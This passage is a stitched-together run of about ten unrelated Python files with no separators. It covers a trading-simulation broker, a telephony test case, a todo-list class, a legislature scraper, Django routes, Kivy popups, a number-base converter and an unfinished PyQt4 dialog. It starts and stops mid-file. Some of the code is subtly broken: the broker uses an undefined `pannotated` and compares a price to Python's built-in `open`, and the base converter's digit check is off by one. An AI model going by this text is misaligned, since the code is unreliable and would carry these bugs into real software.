        self.orders.append(order)
        self.pending.append(order)
        self.notify(order)

        return order

    def buy(self, owner, data,
            size, price=None, plimit=None,
            exectype=None, valid=None):

        order = BuyOrder(owner=owner, data=data,
                         size=size, price=price, pricelimit=plimit,
                         exectype=exectype, valid=valid)

        return self.submit(order)

    def sell(self, owner, data,
             size, price=None, plimit=None,
             exectype=None, valid=None):

        order = SellOrder(owner=owner, data=data,
                          size=size, price=price, pricelimit=plimit,
                          exectype=exectype, valid=valid)

        return self.submit(order)

    def _execute(self, order, dt, price):
        # Orders are fully executed, get operation size
        size = order.executed.remsize

        # Get comminfo object for the data
        comminfo = self.getcommissioninfo(order.data)

        # Adjust position with operation size
        position = self.positions[order.data]
        oldpprice = position.price

        psize, pprice, opened, closed = position.update(size, price)
        abopened, abclosed = abs(opened), abs(closed)

        # if part/all of a position has been closed, then there has been
        # a profitandloss ... record it
        pnl = comminfo.profitandloss(abclosed, oldpprice, price)

        if closed:
            # Adjust to returned value for closed items & acquired opened items
            closedvalue = comminfo.getoperationcost(abclosed, price)
            self.cash += closedvalue
            # Calculate and substract commission
            closedcomm = comminfo.getcomm_pricesize(abclosed, price)
            self.cash -= closedcomm
            # Re-adjust cash according to future-like movements
            # Restore cash which was already taken at the start of the day
            self.cash -= comminfo.cashadjust(abclosed,
                                             price,
                                             order.data.close[0])

            # pnl = comminfo.profitandloss(oldpsize, oldpprice, price)

        else:
            closedvalue = closedcomm = 0.0

        if opened:
            openedvalue = comminfo.getoperationcost(abopened, price)
            self.cash -= openedvalue

            openedcomm = comminfo.getcomm_pricesize(abopened, price)
            self.cash -= openedcomm

            # Remove cash for the new opened contracts
            self.cash += comminfo.cashadjust(abopened,
                                             price,
                                             order.data.close[0])
        else:
            openedvalue = openedcomm = 0.0

        # Execute and notify the order
        order.execute(dt, size, price,
                      closed, closedvalue, closedcomm,
                      opened, openedvalue, openedcomm,
                      comminfo.margin, pnl,
                      psize, pprice)

        self.notify(order)

    def notify(self, order):
        self.notifs.append(order.clone())

    def next(self):
        for data, pos in self.positions.items():
            # futures change cash in the broker in every bar
            # to ensure margin requirements are met
            comminfo = self.getcommissioninfo(data)
            self.cash += comminfo.cashadjust(pos.size,
                                             data.close[-1],
                                             data.close[0])

        # Iterate once over all elements of the pending queue
        for i in range(len(self.pending)):
            order = self.pending.popleft()

            if order.expire():
                self.notify(order)
                continue

            popen = order.data.tick_open or order.data.open[0]
            phigh = order.data.tick_high or order.data.high[0]
            plow = order.data.tick_low or order.data.low[0]
            pclose = order.data.tick_close or order.data.close[0]

            pcreated = order.created.price
            plimit = order.created.pricelimit

            if order.exectype == Order.Market:
                self._execute(order, order.data.datetime[0], price=popen)

            elif order.exectype == Order.Close:
                self._try_exec_close(order, pclose)

            elif order.exectype == Order.Limit:
                self._try_exec_limit(order, popen, phigh, plow, pcreated)

            elif order.exectype == Order.StopLimit and order.triggered:
                self._try_exec_limit(order, popen, phigh, plow, plimit)

            elif order.exectype == Order.Stop:
                self._try_exec_stop(order, popen, phigh, plow, pcreated)

            elif order.exectype == Order.StopLimit:
                self._try_exec_stoplimit(order,
                                         popen, phigh, plow, pclose,
                                         pcreated, plimit)

            if order.alive():
                self.pending.append(order)

    def _try_exec_close(self, order, pclose):
        if len(order.data) > order.plen:

            dt0 = order.data.datetime[0]

            if dt0 > order.dteos:
                if order.pannotated:
                    execdt = order.data.datetime[-1]
                    execprice = pannotated
                else:
                    execdt = dt0
                    execprice = pclose

                self._execute(order, execdt, price=execprice)

                return

        # If no exexcution has taken place ... annotate the closing price
        order.pannotated = pclose

    def _try_exec_limit(self, order, popen, phigh, plow, plimit):
        if order.isbuy():
            if plimit >= popen:
                # open smaller/equal than requested - buy cheaper
                self._execute(order, order.data.datetime[0], price=popen)
            elif plimit >= plow:
                # day low below req price ... match limit price
                self._execute(order, order.data.datetime[0], price=plimit)

        else:  # Sell
            if plimit <= popen:
                # open greater/equal than requested - sell more expensive
                self._execute(order, order.data.datetime[0], price=popen)
            elif plimit <= phigh:
                # day high above req price ... match limit price
                self._execute(order, order.data.datetime[0], price=plimit)

    def _try_exec_stop(self, order, popen, phigh, plow, pcreated):
        if order.isbuy():
            if popen >= pcreated:
                # price penetrated with an open gap - use open
                self._execute(order, order.data.datetime[0], price=popen)
            elif phigh >= pcreated:
                # price penetrated during the session - use trigger price
                self._execute(order, order.data.datetime[0], price=pcreated)

        else:  # Sell
            if popen <= pcreated:
                # price penetrated with an open gap - use open
                self._execute(order, order.data.datetime[0], price=popen)
            elif plow <= pcreated:
                # price penetrated during the session - use trigger price
                self._execute(order, order.data.datetime[0], price=pcreated)

    def _try_exec_stoplimit(self, order,
                            popen, phigh, plow, pclose,
                            pcreated, plimit):
        if order.isbuy():
            if popen >= pcreated:
                order.triggered = True
                # price penetrated with an open gap
                if plimit >= popen:
                    self._execute(order, order.data.datetime[0], price=popen)
                elif plimit >= plow:
                    # execute in same bar
                    self._execute(order, order.data.datetime[0], price=plimit)

            elif phigh >= pcreated:
                # price penetrated upwards during the session
                order.triggered = True
                # can calculate execution for a few cases - datetime is fixed
                dt = order.data.datetime[0]
                if popen > pclose:
                    if plimit >= pcreated:
                        self._execute(order, dt, price=pcreated)
                    elif plimit >= pclose:
                        self._execute(order, dt, price=plimit)
                else:  # popen < pclose
                    if plimit >= pcreated:
                        self._execute(order, dt, price=pcreated)
        else:  # Sell
            if popen <= pcreated:
                # price penetrated downwards with an open gap
                order.triggered = True
                if plimit <= open:
                    self._execute(order, order.data.datetime[0], price=popen)
                elif plimit <= phigh:
                    # execute in same bar
                    self._execute(order, order.data.datetime[0], price=plimit)

            elif plow <= pcreated:
                # price penetrated downwards during the session
                order.triggered = True
                # can calculate execution for a few cases - datetime is fixed
                dt = order.data.datetime[0]
                if popen <= pclose:
                    if plimit <= pcreated:
                        self._execute(order, dt, price=pcreated)
                    elif plimit <= pclose:
                        self._execute(order, dt, price=plimit)
                else:
                    # popen > pclose
                    if plimit <= pcreated:
                        self._execute(order, dt, price=pcreated)

#! /usr/bin/env python

import logging, logtool
from .page import Page
from .xlate_frame import XlateFrame

LOG = logging.getLogger (__name__)

class Contents:

  @logtool.log_call
  def __init__ (self, canvas, objects):
    self.canvas = canvas
    self.objects = objects

  @logtool.log_call
  def render (self):
    with Page (self.canvas) as pg:
      for obj in self.objects:
        coords = pg.next (obj.asset)
        with XlateFrame (self.canvas, obj.tile_type, *coords,
                         inset_by = "margin"):
          # print ("Obj: ", obj.asset)
          obj.render ()

# -*- coding: utf-8 -*-
import logging
from pprint     import pformat
from time       import clock, sleep

try:
    import unittest2 as unittest
except ImportError:
    import unittest

import config
from event_stack             import TimeOutReached
from database_reception      import Database_Reception
from static_agent_pools      import Receptionists, Customers

logging.basicConfig (level = logging.INFO)

class Test_Case (unittest.TestCase):
    Caller             = None
    Receptionist       = None
    Receptionist_2     = None
    Callee             = None

    Reception_Database = None

    Reception          = None

    Start_Time         = None
    Next_Step          = 1

    def Preconditions (self, Reception):
        self.Start_Time = clock ()
        self.Next_Step  = 1

        self.Log ("Incoming calls test case: Setting up preconditions...")

        self.Log ("Requesting a customer (caller)...")
        self.Caller = Customers.request ()

        self.Log ("Requesting a receptionist...")
        self.Receptionist = Receptionists.request ()

        self.Log ("Requesting a second receptionist...")
        self.Receptionist_2 = Receptionists.request ()

        self.Log ("Requesting a customer (callee)...")
        self.Callee = Customers.request ()

        self.Log ("Select which reception to test...")
        self.Reception    = Reception

        self.Log ("Select a reception database connection...")
        self.Reception_Database = Database_Reception (uri       = config.reception_server_uri,
                                                      authtoken = self.Receptionist.call_control.authtoken)


    def Postprocessing (self):
        self.Log ("Incoming calls test case: Cleaning up after test...")

        if not self.Caller is None:
            self.Caller.release ()
        if not self.Receptionist is None:
            self.Receptionist.release ()
        if not self.Receptionist_2 is None:
            self.Receptionist_2.release ()
        if not self.Callee is None:
            self.Callee.release ()

    def Step (self,
              Message,
              Delay_In_Seconds = 0.0):
        if self.Next_Step is None:
            self.Next_Step = 1
        if self.Start_Time is None:
            self.Start_Time = clock ()

        logging.info ("Step " + str (self.Next_Step) + ": " + Message)
        sleep (Delay_In_Seconds)
        self.Next_Step += 1

    def Log (self,
             Message,
             Delay_In_Seconds = 0.0):
        if self.Next_Step is None:
            self.Next_Step = 1
        if self.Start_Time is None:
            self.Start_Time = clock ()

        logging.info ("     " + str (self.Next_Step - 1) + ": " + Message)
        sleep (Delay_In_Seconds)

    def Caller_Places_Call (self, Number):
        self.Step (Message = "Caller places call to " + str (Number) + "...")

        self.Log (Message = "Dialling through caller agent...")
        self.Caller.dial (Number)

    def Receptionist_Places_Call (self, Number):
        self.Step (Message = "Receptionist places call to " + str (Number) + "...")

        self.Log (Message = "Dialling through receptionist agent...")
        self.Receptionist.dial (Number)

    def Caller_Hears_Dialtone (self):
        self.Step (Message = "Caller hears dial-tone...")

        self.Log (Message = "Caller agent waits for dial-tone...")
        self.Caller.sip_phone.Wait_For_Dialtone ()

    def Receptionist_Hears_Dialtone (self):
        self.Step (Message = "Receptionist hears dial-tone...")

        self.Log (Message = "Receptionist agent waits for dial-tone...")
        self.Receptionist.sip_phone.Wait_For_Dialtone ()

    def Call_Announced (self):
        self.Step (Message = "Receptionist's client waits for 'call_offer'...")

        try:
            self.Receptionist.event_stack.WaitFor ("call_offer")
        except TimeOutReached:
            logging.critical (self.Receptionist.event_stack.dump_stack ())
            self.fail ("Call offer didn't arrive from Call-Flow-Control.")

        if not self.Receptionist.event_stack.stack_contains (event_type="call_offer",
                                                             destination=self.Reception):
            logging.critical (self.Receptionist.event_stack.dump_stack ())
            self.fail ("The arrived call offer was not for the expected reception (destination).")

        return self.Receptionist.event_stack.Get_Latest_Event (Event_Type="call_offer", Destination=self.Reception)['call']['id'],\
               self.Receptionist.event_stack.Get_Latest_Event (Event_Type="call_offer", Destination=self.Reception)['call']['reception_id']

    def Call_Announced_As_Locked (self, Call_ID):
        self.Step (Message = "Call-Flow-Control sends out 'call_lock'...")

        try:
            self.Receptionist.event_stack.WaitFor (event_type = "call_lock",
                                                   call_id    = Call_ID,
                                                   timeout    = 20.0)
        except TimeOutReached:
            logging.critical (self.Receptionist.event_stack.dump_stack ())
            self.fail ("No 'call_lock' event arrived from Call-Flow-Control.")

        if not self.Receptionist.event_stack.stack_contains (event_type  = "call_lock",
                                                             destination = self.Reception,
                                                             call_id     = Call_ID):
            logging.critical (self.Receptionist.event_stack.dump_stack ())
            self.fail ("The arrived 'call_lock' event was not for the expected reception (destination).")

    def Call_Announced_As_Unlocked (self, Call_ID):
        self.Step (Message = "Call-Flow-Control sends out 'call_unlock'...")

        try:
            self.Receptionist.event_stack.WaitFor (event_type = "call_unlock",
                                                   call_id    = Call_ID)
        except TimeOutReached:
            logging.critical (self.Receptionist.event_stack.dump_stack ())
            self.fail ("No 'call_unlock' event arrived from Call-Flow-Control.")

        if not self.Receptionist.event_stack.stack_contains (event_type  = "call_unlock",
                                                             destination = self.Reception,
                                                             call_id     = Call_ID):
            logging.critical (self.Receptionist.event_stack.dump_stack ())
            self.fail ("The arrived 'call_unlock' event was not for the expected reception (destination).")

    def Request_Information (self, Reception_ID):
        self.Step (Message = "Requesting (updated) information about reception " + str (Reception_ID))

        Data_On_Reception = self.Reception_Database.Single (Reception_ID)

        self.Step (Message = "Received information on reception " + str (Reception_ID))

        return Data_On_Reception

    def Offer_To_Pick_Up_Call (self, Call_Flow_Control, Call_ID):
        self.Step (Message = "Client offers to answer call...")

        try:
            Call_Flow_Control.PickupCall (call_id = Call_ID)
        except:
            self.Log (Message = "Pick-up call returned an error of some kind.")

    def Call_Allocation_Acknowledgement (self, Call_ID, Receptionist_ID):
        self.Step (Message = "Receptionist's client waits for 'call_pickup'...")

        try:
            self.Receptionist.event_stack.WaitFor (event_type = "call_pickup",
                                                   call_id    = Call_ID)
        except TimeOutReached:
            logging.critical (self.Receptionist.event_stack.dump_stack ())
            self.fail ("No 'call_pickup' event arrived from Call-Flow-Control.")

        try:
            Event = self.Receptionist.event_stack.Get_Latest_Event (Event_Type = "call_pickup",
                                                                    Call_ID    = Call_ID)
        except:
            logging.critical (self.Receptionist.event_stack.dump_stack ())
            self.fail ("Could not extract the received 'call_pickup' event from the Call-Flow-Control client.")

        try:
            if not Event['call']['assigned_to'] == Receptionist_ID:
                logging.critical (self.Receptionist.event_stack.dump_stack ())
                self.fail ("The arrived 'call_pickup' event was for " + str (Event['call']['assigned_to']) + ", and not for " + str (Receptionist_ID) + " as expected.")
        except:
            logging.critical (self.Receptionist.event_stack.dump_stack ())
            raise

        self.Log (Message = "Call picked up: " + pformat (Event))

        return Event

    def Receptionist_Answers (self, Call_Information, Reception_Information, After_Greeting_Played):
        self.Step (Message = "Receptionist answers...")

        if Call_Information['call']['greeting_played']:
            try:
                self.Log (Message = "Receptionist says '" + Reception_Information['short_greeting'] + "'.")
            except:
                self.fail ("Reception information missing 'short_greeting'.")
        else:
            try:
                self.Log (Message = "Receptionist says '" + Reception_Information['greeting'] + "'.")
            except:
                self.fail ("Reception information missing 'greeting'.")

        if After_Greeting_Played:
            if not Call_Information['call']['greeting_played']:
                self.fail ("It appears that the receptionist didn't wait long enough to allow the caller to hear the recorded message.")
        else:
            if Call_Information['call']['greeting_played']:
                self.fail ("It appears that the receptionist waited too long, and allowed the caller to hear the recorded message.")

# Topydo - A todo.txt client written in Python.
# Copyright (C) 2014 - 2015 Bram Schoenmakers <bram@topydo.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

"""
This module provides the Todo class.
"""

from datetime import date

from topydo.lib.Config import config
from topydo.lib.TodoBase import TodoBase
from topydo.lib.Utils import date_string_to_date


class Todo(TodoBase):
    """
    This class adds common functionality with respect to dates to the Todo
    base class, mainly by interpreting the start and due dates of task.
    """

    def __init__(self, p_str):
        TodoBase.__init__(self, p_str)
        self.attributes = {}

    def get_date(self, p_tag):
        """ Given a date tag, return a date object. """
        string = self.tag_value(p_tag)
        result = None

        try:
            result = date_string_to_date(string) if string else None
        except ValueError:
            pass

        return result

    def start_date(self):
        """ Returns a date object of the todo's start date. """
        return self.get_date(config().tag_start())

    def due_date(self):
        """ Returns a date object of the todo's due date. """
        return self.get_date(config().tag_due())

    def is_active(self):
        """
        Returns True when the start date is today or in the past and the
        task has not yet been completed.
        """
        start = self.start_date()
        return not self.is_completed() and (not start or start <= date.today())

    def is_overdue(self):
        """
        Returns True when the due date is in the past and the task has not
        yet been completed.
        """
        return not self.is_completed() and self.days_till_due() < 0

    def days_till_due(self):
        """
        Returns the number of days till the due date. Returns a negative number
        of days when the due date is in the past.
        Returns 0 when the task has no due date.
        """
        due = self.due_date()
        if due:
            diff = due - date.today()
            return diff.days
        return 0

    def length(self):
        """
        Returns the length (in days) of the task, by considering the start date
        and the due date. When there is no start date, its creation date is
        used. Returns 0 when one of these dates is missing.
        """
        start = self.start_date() or self.creation_date()
        due = self.due_date()

        if start and due and start < due:
            diff = due - start
            return diff.days
        else:
            return 0

from pupa.scrape import Jurisdiction, Organization
from .bills import MNBillScraper
from .committees import MNCommitteeScraper
from .people import MNPersonScraper
from .vote_events import MNVoteScraper
from .events import MNEventScraper
from .common import url_xpath

"""
Minnesota legislative data can be found at the Office of the Revisor
of Statutes:
https://www.revisor.mn.gov/

Votes:
There are not detailed vote data for Senate votes, simply yes and no counts.
Bill pages have vote counts and links to House details, so it makes more
sense to get vote data from the bill pages.
"""


class Minnesota(Jurisdiction):
    division_id = "ocd-division/country:us/state:mn"
    classification = "government"
    name = "Minnesota"
    url = "http://state.mn.us/"
    check_sessions = True
    scrapers = {
        "bills": MNBillScraper,
        "committees": MNCommitteeScraper,
        "people": MNPersonScraper,
        "vote_events": MNVoteScraper,
        "events": MNEventScraper,
    }
    parties = [{'name': 'Republican'},
               {'name': 'Democratic-Farmer-Labor'}]
    legislative_sessions = [
        {
            '_scraped_name': '86th Legislature, 2009-2010',
            'classification': 'primary',
            'identifier': '2009-2010',
            'name': '2009-2010 Regular Session'
        },
        {
            '_scraped_name': '86th Legislature, 2010 1st Special Session',
            'classification': 'special',
            'identifier': '2010 1st Special Session',
            'name': '2010, 1st Special Session'
        },
        {
            '_scraped_name': '86th Legislature, 2010 2nd Special Session',
            'classification': 'special',
            'identifier': '2010 2nd Special Session',
            'name': '2010, 2nd Special Session'
        },
        {
            '_scraped_name': '87th Legislature, 2011-2012',
            'classification': 'primary',
            'identifier': '2011-2012',
            'name': '2011-2012 Regular Session'
        },
        {
            '_scraped_name': '87th Legislature, 2011 1st Special Session',
            'classification': 'special',
            'identifier': '2011s1',
            'name': '2011, 1st Special Session'
        },
        {
            '_scraped_name': '87th Legislature, 2012 1st Special Session',
            'classification': 'special',
            'identifier': '2012s1',
            'name': '2012, 1st Special Session'
        },
        {
            '_scraped_name': '88th Legislature, 2013-2014',
            'classification': 'primary',
            'identifier': '2013-2014',
            'name': '2013-2014 Regular Session'
        },
        {
            '_scraped_name': '88th Legislature, 2013 1st Special Session',
            'classification': 'special',
            'identifier': '2013s1',
            'name': '2013, 1st Special Session'
        },
        {
            '_scraped_name': '89th Legislature, 2015-2016',
            'classification': 'primary',
            'identifier': '2015-2016',
            'name': '2015-2016 Regular Session'
        },
        {
            '_scraped_name': '89th Legislature, 2015 1st Special Session',
            'classification': 'special',
            'identifier': '2015s1',
            'name': '2015, 1st Special Session'
        },
        {
            '_scraped_name': '90th Legislature, 2017-2018',
            'classification': 'primary',
            'identifier': '2017-2018',
            'name': '2017-2018 Regular Session'
        },
    ]
    ignored_scraped_sessions = [
        '85th Legislature, 2007-2008',
        '85th Legislature, 2007 1st Special Session',
        '84th Legislature, 2005-2006',
        '84th Legislature, 2005 1st Special Session',
        '83rd Legislature, 2003-2004',
        '83rd Legislature, 2003 1st Special Session',
        '82nd Legislature, 2001-2002',
        '82nd Legislature, 2002 1st Special Session',
        '82nd Legislature, 2001 1st Special Session',
        '81st Legislature, 1999-2000',
        '80th Legislature, 1997-1998',
        '80th Legislature, 1998 1st Special Session',
        '80th Legislature, 1997 3rd Special Session',
        '80th Legislature, 1997 2nd Special Session',
        '80th Legislature, 1997 1st Special Session',
        '79th Legislature, 1995-1996',
        '79th Legislature, 1995 1st Special Session',
        '89th Legislature, 2015-2016',
    ]

    def get_organizations(self):
        legis = Organization('Minnesota Legislature', classification='legislature')

        upper = Organization('Minnesota Senate', classification='upper',
                             parent_id=legis._id)
        lower = Organization('Minnesota House of Representatives',
                             classification='lower', parent_id=legis._id)

        for n in range(1, 68):
            upper.add_post(label=str(n), role='Senator',
                           division_id='ocd-division/country:us/state:mn/sldu:{}'.format(n))
            lower.add_post(label=str(n) + 'A', role='Representative',
                           division_id='ocd-division/country:us/state:mn/sldl:{}a'.format(n))
            lower.add_post(label=str(n) + 'B', role='Representative',
                           division_id='ocd-division/country:us/state:mn/sldl:{}b'.format(n))

        yield legis
        yield upper
        yield lower

    def get_session_list(self):
        return url_xpath('https://www.revisor.mn.gov/revisor/pages/'
                         'search_status/status_search.php?body=House',
                         '//select[@name="session"]/option/text()')

'''
Copyright 2015

This file is part of Orbach.

Orbach is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

Orbach is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with Orbach.  If not, see <http://www.gnu.org/licenses/>.
'''
from django.conf.urls import url, include
from rest_framework.routers import DefaultRouter

from orbach.core import views

router = DefaultRouter()
router.register(r'galleries', views.GalleryViewSet)
router.register(r'image_files', views.ImageFileViewSet)
router.register(r'users', views.UserViewSet)

urlpatterns = [
    url(r'^', include(router.urls)),
]

import kivy
kivy.require('1.9.1')
from kivy.uix.popup import Popup
from kivy.uix.label import Label
from kivy.uix.gridlayout import GridLayout
from kivy.metrics import dp
from kivy.app import Builder
from kivy.properties import StringProperty, ObjectProperty
from kivy.clock import Clock
from kivy.metrics import sp
from kivy.metrics import dp
from iconbutton import IconButton

__all__ = ('alertPopup, confirmPopup, okPopup, editor_popup')

Builder.load_string('''
<ConfirmPopup>:
    cols:1
    Label:
        text: root.text
    GridLayout:
        cols: 2
        size_hint_y: None
        height: '44sp'
        spacing: '5sp'
        IconButton:
            text: u'\uf00c'
            on_press: root.dispatch('on_answer', True)
        IconButton:
            text: u'\uf00d'
            color: ColorScheme.get_primary()            
            on_release: root.dispatch('on_answer', False)
            
<OkPopup>:
    cols:1
    Label:
        text: root.text
    GridLayout:
        cols: 2
        size_hint_y: None
        height: '44sp'
        spacing: '5sp'
        IconButton:
            text: u'\uf00c'
            on_press: root.dispatch('on_answer', True)
            
            
<EditorPopup>:
    id: editor_popup
    cols:1
    BoxLayout:
        id: content
    GridLayout:
        id: buttons
        cols: 2
        size_hint_y: None
        height: '44sp'
        spacing: '5sp'
        IconButton:
            text: u'\uf00c'
            on_press: root.dispatch('on_answer', True)
        IconButton:
            text: u'\uf00d'
            color: ColorScheme.get_primary()            
            on_release: root.dispatch('on_answer', False)
            
''')
 
def alertPopup(title, msg):
    popup = Popup(title = title,
                      content=Label(text = msg),
                      size_hint=(None, None), size=(dp(600), dp(200)))
    popup.open()    
 
def confirmPopup(title, msg, answerCallback):
    content = ConfirmPopup(text=msg)
    content.bind(on_answer=answerCallback)
    popup = Popup(title=title,
                    content=content,
                    size_hint=(None, None),
                    size=(dp(600),dp(200)),
                    auto_dismiss= False)
    popup.open()
    return popup
    
class ConfirmPopup(GridLayout):
    text = StringProperty()
    
    def __init__(self,**kwargs):
        self.register_event_type('on_answer')
        super(ConfirmPopup,self).__init__(**kwargs)
        
    def on_answer(self, *args):
        pass    

def editor_popup(title, content, answerCallback):
    content = EditorPopup(content=content)
    content.bind(on_answer=answerCallback)
    popup = Popup(title=title,
                    content=content,
                    size_hint=(0.7, 0.8),
                    auto_dismiss= False,
                  title_size=sp(18))
    popup.open()
    return popup
    
class EditorPopup(GridLayout):
    content = ObjectProperty(None)
    
    def __init__(self,**kwargs):
        self.register_event_type('on_answer')
        super(EditorPopup,self).__init__(**kwargs)
    
    def on_content(self, instance, value):
        Clock.schedule_once(lambda dt: self.ids.content.add_widget(value))
        
    def on_answer(self, *args):
        pass    

def okPopup(title, msg, answerCallback):
    content = OkPopup(text=msg)
    content.bind(on_ok=answerCallback)
    popup = Popup(title=title,
                    content=content,
                    size_hint=(None, None),
                    size=(dp(600),dp(200)),
                    auto_dismiss= False)
    popup.open()
    return popup
    
class OkPopup(GridLayout):
    text = StringProperty()
    
    def __init__(self,**kwargs):
        self.register_event_type('on_ok')
        super(OkPopup,self).__init__(**kwargs)
        
    def on_ok(self, *args):
        pass    

class CheckBase(object):
    """
    Base class for checks.

    """

    hooks = []
    # pylint: disable=W0105
    """Git hooks to which this class applies. A list of strings."""

    def execute(self, hook):
        """
        Executes the check.

        :param hook: The name of the hook being run.
        :type hook: :class:`str`
        :returns: ``True`` if the check passed, ``False`` if not.
        :rtype: :class:`bool`

        """
        pass

#!/usr/bin/python3

### rev: 5.0
### author: <zhq>
### features:
###     errors included
###     up to 63 bases (2 to 64)
###     caps recognition and same output format (deprecated)
### for the function parameters, `cur` represents the current (input) base, `res` represents the result (output) base, and `num` represents the current (input) number.

def scale(cur, res, num):
#         int, int, str -> str
# Default Settings
    num = str(num)
    iscaps = False
    positive = True

    # Input
    if cur == res: return num
    if num == "0": return "0"
    assert cur in range(2, 65) and res in range(2, 65), "Base not defined."
    if num[0] == "-":
        positive = False
        num = num[1:]
    result = 0
    unit = 1

    if cur != 10:
        for i in num[::-1]:
            value = ord(i)
            if value in range(48, 58): value -= 48
            elif value in range(65, 92): value -= 55
            elif value in range(97, 123): value -= 61
            elif value == 64: value = 62
            elif value == 95: value = 63
            assert value <= cur, "Digit larger than original base. v:%d(%s) b:%d\nCall: scale(%d, %d, %s)" % (value, i, cur, cur, res, num)
            result += value * unit
            unit *= cur
        result = str(result)

    # Output
    if res != 10:
        num = int(result or num)
        result = ""
        while num > 0:
            num, value = divmod(num, res)
            if value < 10: digit = value + 48
            elif value < 36: digit = value + 55
            elif value < 62: digit = value + 61
            elif value == 62: digit = 64
            elif value == 63: digit = 95
            result = chr(digit) + result
    if not positive: result = "-" + result
    return result

# -*- coding: utf-8 -*-

# Form implementation generated from reading ui file 'events.ui'
#
# Created by: PyQt4 UI code generator 4.11.4
#
# WARNING! All changes made in this file will be lost!

from PyQt4 import QtCore, QtGui
from collections import *
from functools import *
import os, glob
import pandas as pd

try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    def _fromUtf8(s):
        return s

try:
    _encoding = QtGui.QApplication.UnicodeUTF8


    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig)


class Ui_SamplesDialog(QtGui.QDialog):
    def __init__(self, parent=None, datafolder=None):
        """
        Constructor
        """
        QtGui.QDialog.__init__(self, parent)

        # self.filelist = filelist
        self.datafolder = datafolder

        # labels font
        self.font_labels = QtGui.QFont("Arial", 12, QtGui.QFont.Bold)
        self.font_edits = QtGui.QFont("Arial", 12)
        self.font_buttons = QtGui.QFont("Arial", 10, QtGui.QFont.Bold)


        self.setupUi(self)
        self.exec_()

    def setupUi(self, Dialog):
        Dialog.setObjectName(_fromUtf8("Dialog"))
        Dialog.resize(1000, 400)

        self.gridLayout = QtGui.QGridLayout(Dialog)
        self.gridLayout.setObjectName(_fromUtf8("gridLayout"))

        # list of Events
        self.prepare_form(Dialog)

        self.retranslateUi(Dialog)
        QtCore.QMetaObject.connectSlotsByName(Dialog)

    def load_data(self):
        print(self.datafolder)
        self.samplefile = glob.glob(os.path.join(self.datafolder, "*_SAMPLES.csv"))[0]
        if os.path.isfile(self.samplefile):
            self.samplesdf = pd.read_csv(self.samplefile, encoding='ISO-8859-1')
        else:
            print("File not found: ", self.samplefile)
            self.samplesdf = None

        self.combodefaults = {'cuvette': ['600', '2000', '4000']}

    def prepare_form(self, Dialog):
        # load or reload data
        self.load_data()

        # form dicts
        edit_list = ['date', 'time', 'samplename', 'filename', 'smoothing', 'cal32', 'cal44', 'cons32', 'cons44',
                     'zero44', 'zero45', 'zero46', 'zero47', 'zero49']
        combo_list = ['user', 'membrane', 'cuvette']

        self.labels = defaultdict(defaultdict)
        self.edits = defaultdict(defaultdict)
        self.radios = defaultdict(defaultdict)
        self.combobox = defaultdict(defaultdict)
        self.labs = defaultdict(defaultdict)

        self.labs = {"time": "Time",
                     "date": "Date",
                     "samplename": "Sample Name",
                     "filename": "File Name",
                     "smoothing": "Smoothing",
                     "cuvette": "Cuvette",
                     "user": "User",
                     "membrane": "Membrane",
                     "cal44": "Calibration 44",
                     "cal32": "Calibration 32",
                     "cons32": "Consumption 32",
                     "cons44": "Consumption 44",
                     "zero32": "Zero 32",
                     "zero44": "Zero 44",
                     "zero45": "Zero 45",
                     "zero46": "Zero 46",
                     "zero47": "Zero 47",
                     "zero49": "Zero 49"}

        self.buttons = OrderedDict(sorted({'Apply': defaultdict(object), 'Delete': defaultdict(object)}.items()))

        xpos, ypos = 1, 0
        for row in self.samplesdf.iterrows():
            row_index = row[0]
            r = row[1]

            self.radios[row_index] = QtGui.QRadioButton(Dialog)
            self.radios[row_index].setObjectName(_fromUtf8("_".join(["radio", str(row_index)])))
            self.gridLayout.addWidget(self.radios[row_index], ypos+1, 0, 1, 1)

            for k in ['samplename', 'date', 'time', 'cuvette']:
                # create labels
                if ypos == 0:
                    self.labels[k] = QtGui.QLabel(Dialog)
                    self.labels[k].setObjectName(_fromUtf8("_".join(["label", k])))
                    self.labels[k].setText(str(self.labs[k]))
                    self.labels[k].setAlignment(QtCore.Qt.AlignCenter | QtCore.Qt.AlignVCenter)
                    self.labels[k].setFont(self.font_labels)
                    self.gridLayout.addWidget(self.labels[k], 0, xpos, 1, 1)

                if k in edit_list:
                    self.edits[k][row_index] = QtGui.QLineEdit(Dialog)
                    self.edits[k][row_index].setObjectName(_fromUtf8("_".join(["edit", k, str(row_index)])))
                    self.edits[k][row_index].setText(str(r[k]))
                    self.edits[k][row_index].setFont(self.font_edits)

                    if k in ['time', 'date']:
                        self.edits[k][row_index].setFixedWidth(80)

                    self.gridLayout.addWidget(self.edits[k][row_index], ypos+1, xpos, 1, 1)

                elif k in combo_list:
                    self.combobox[k][row_index] = QtGui.QComboBox(Dialog)
                    self.combobox[k][row_index].setObjectName(_fromUtf8("_".join(["combo", k, str(row_index)])))
                    self.combobox[k][row_index].addItems(self.combodefaults[k])
                    self.combobox[k][row_index].setCurrentIndex(self.combobox[k][row_index].findText(str(r[k]), QtCore.Qt.MatchFixedString))
                    self.combobox[k][row_index].setFont(self.font_edits)
                    self.gridLayout.addWidget(self.combobox[k][row_index], ypos+1, xpos, 1, 1)

                xpos += 1

            # create buttons
            for k in self.buttons.keys():
                # if ypos > 0:
                    self.buttons[k][row_index] = QtGui.QPushButton(Dialog)
                    self.buttons[k][row_index].setObjectName(_fromUtf8("_".join(["event", k, "button", str(row_index)])))
                    self.buttons[k][row_index].setText(_translate("Dialog", k + str(row_index), None))
                    self.buttons[k][row_index].setFont(self.font_buttons)

                    if k == 'Apply':
